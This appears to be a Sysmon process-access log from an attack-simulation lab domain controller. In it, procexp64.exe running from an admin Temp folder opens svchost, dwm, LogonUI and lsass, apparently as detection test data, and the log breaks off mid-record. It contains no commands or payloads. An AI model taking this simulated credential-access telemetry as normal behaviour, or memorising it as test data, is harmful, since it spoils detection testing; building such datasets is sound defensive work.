10341000x8000000000000000789119Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789118Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789117Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789116Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789115Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789114Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789113Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789112Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789111Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789110Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789109Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789108Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789107Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789106Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789105Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789104Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789103Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789102Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Wi